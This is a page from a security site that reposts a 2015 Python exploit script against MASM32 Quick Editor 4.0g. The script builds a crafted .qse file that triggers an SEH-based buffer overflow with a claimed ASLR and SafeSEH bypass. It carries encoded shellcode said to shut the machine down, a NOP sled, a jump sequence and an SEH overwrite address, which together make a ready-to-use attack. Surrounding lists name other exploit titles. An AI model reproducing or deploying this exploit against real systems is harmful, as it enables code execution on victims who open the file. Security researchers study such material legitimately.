首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & 来源：st0rn[at]anbu-pentest[dot]com 作者：St0rn 发布时间：2015-08-18   #!/usr/bin/env python # # Exploit Title: MASM32 quick editor .QSE SEH Based Buffer Overflow (ASLR & SAFESEH bypass) # Date: 2015-08-15 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: http://www.masm32.com/ # Software Link:   http://www.masm32.com/masmdl.htm # Version: MASM32 11 qeditor 4.0g # Tested on: Windows 7 #     from struct import pack import sys   # 95 bytes Little Joke shellcode :p (shutdown) # The shellcode must be printable shellcode="" shellcode+="\x89\xE3" shellcode+="\xDB\xC2" shellcode+="\xD9\x73\xF4" shellcode+="\x5E" shellcode+="VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF" shellcode+="THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D" shellcode+="QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1" shellcode+="CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI" shellcode+="NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA"     nop="\x90"*(1140-35)        # Destination of jump: qeditor add 8C opcode (mov in assembly) which crash qeditor bypass="\xe2"               # with the nop (8C90 90909090) to bypass this we can use different opcodes. endnop="\x90"*34            # The opcode e2 make the instruction 8ce2 (MOV DX,FS) and the execution flow nop+=bypass+endnop          # can be continued                                  junk="\x90"*(1704-95)       # Junk after shellcode padding='\x62'*52           # 52 bytes available after SE Handler     jump="\xe9\x14\xf5\xff\xff" # jump to the nop nseh="\xeb\xf9\x90\x90"     # jump to previous instruction seh=pack("<I",0x00406a25)   # asciiprint: pop edi pop esi ret (C:\masm32\qeditor.exe)     payload=nop+shellcode+junk+jump+nseh+seh+padding   try:  f=open("evil.qse","w")  f.write(payload)  f.close()  print "Evil QSE script created!\nHack'n'Roll" except:  print "Can't create Evil QSE script :'("  sys.exit(0)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·XMPlay 3.8.1.12 - .pls Local C ·Werkzeug Debug Shell Command E ·Ubuntu 14.04 NetKit FTP Client ·VideoCharge Studio Buffer Over ·Ability FTP Server 2.1.4 - Adm ·Symantec Endpoint Protection M ·Ability FTP Server 2.1.4 - afs ·Mac OS X "tpwn" Privilege Esca ·Firefox < 39.03 - pdf.js Same ·Easy File Management Web Serve ·Microsoft Windows HTA (HTML Ap ·Valhala Honeypot 1.8 - Stack-B   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved